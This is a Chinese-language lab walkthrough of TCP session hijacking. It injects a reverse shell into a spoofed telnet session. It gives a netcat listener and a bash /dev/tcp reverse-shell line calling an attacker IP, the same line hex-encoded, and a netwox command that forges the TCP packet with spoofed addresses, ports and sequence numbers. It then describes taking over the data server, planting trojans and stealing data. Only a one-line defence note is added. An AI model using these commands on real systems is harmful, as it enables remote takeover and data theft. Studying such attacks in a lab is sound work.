反彈Shell的注入
思路:
通過劫持Server與數據Server的TCP報文,並僞造成Server,向其注入反彈Shell,使攻擊者獲得對數據Server的完全控制,竊取數據
全局模式下測試:
攻擊者Kali監聽這個10000端口
$ nc -lp 10000 -vvv
數據Server跟Kali進行TCP會話的建立
# bash -i>&/dev/tcp/192.168.211.130/10000 0>&1
此時攻擊者就連接上了數據Server,而且是root權限,接下來就可以注入木馬,竊取數據
劫持下的反彈Shell注入
步驟:
1.首先獲取Server與數據Server的TCP會話
Server telnet 數據Server
2.將注入的代碼段轉換成16進制格式
攻擊代碼
bash -i>&/dev/tcp/192.168.211.130/10000 0>&1
16進制 並在其後加入0d00
62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.211.134 --ip4-dst 192.168.211.133 --tcp-src 48271 --tcp-dst 23 --tcp-seqnum 1853475182 --tcp-acknum 1216288044 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00
實施攻擊:
終端欄的第四個窗口是Kali正在進行監聽的TCP端口號爲10000的會話
查看:可見Kali已經攻擊成功,並且進入到了數據Server,這裏之所以是redhat用戶,是因爲Server telnet的是數據Server上的redhat用戶
詳細分析:
觀察打擊後的兩個telnet包,可見是Server發送給數據Server一個數據爲 攻擊者Kali注入的代碼,但是此時,其實是攻擊者冒充了Server,對於數據Server來說,他並不知道,因爲攻擊者Kali將源目IP、源目端口、ACK、SEQ都僞造了,數據Server是無法判斷的,數據Server還會給他一個迴應,這一旦迴應,攻擊者Kali直接登錄到數據Server上
這時,Server就斷開了與數據Server的telnet連接,一直等不到迴應是因爲此時的telnet來連接時攻擊者Kali與數據Server建立的,這樣一直虛假重傳,過會就會斷開連接
而此時,Kali可以隨意的竊取並留下一些木馬病毒
防禦:
使用SSL加密tcp ,ipsec加密IP,二層加密